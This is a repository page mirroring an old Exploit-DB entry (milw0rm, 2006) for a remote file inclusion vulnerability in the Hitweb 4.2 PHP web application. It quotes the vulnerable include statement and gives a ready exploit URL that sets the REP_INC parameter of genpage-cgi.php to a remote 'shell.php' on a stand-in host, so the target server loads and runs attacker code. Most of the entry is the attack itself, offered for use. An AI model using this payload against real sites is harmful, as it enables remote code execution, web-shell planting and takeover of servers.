bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/2149.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
382 B
Text
Raw Blame History

Hitweb 4.2 Remote Include File
CreW: ToxiC
Bug Found By Drago84
Sorce Code:
http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz
Problem is:
include "$REP_INC/lib_database.php";
Page:
genpage-cgi.php
Path:
Declare $REP_INC
Expl:
http://www.site.com/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?
Greatz:Str0ke
# milw0rm.com [2006-08-08]
Reference in a new issue View git blame Copy permalink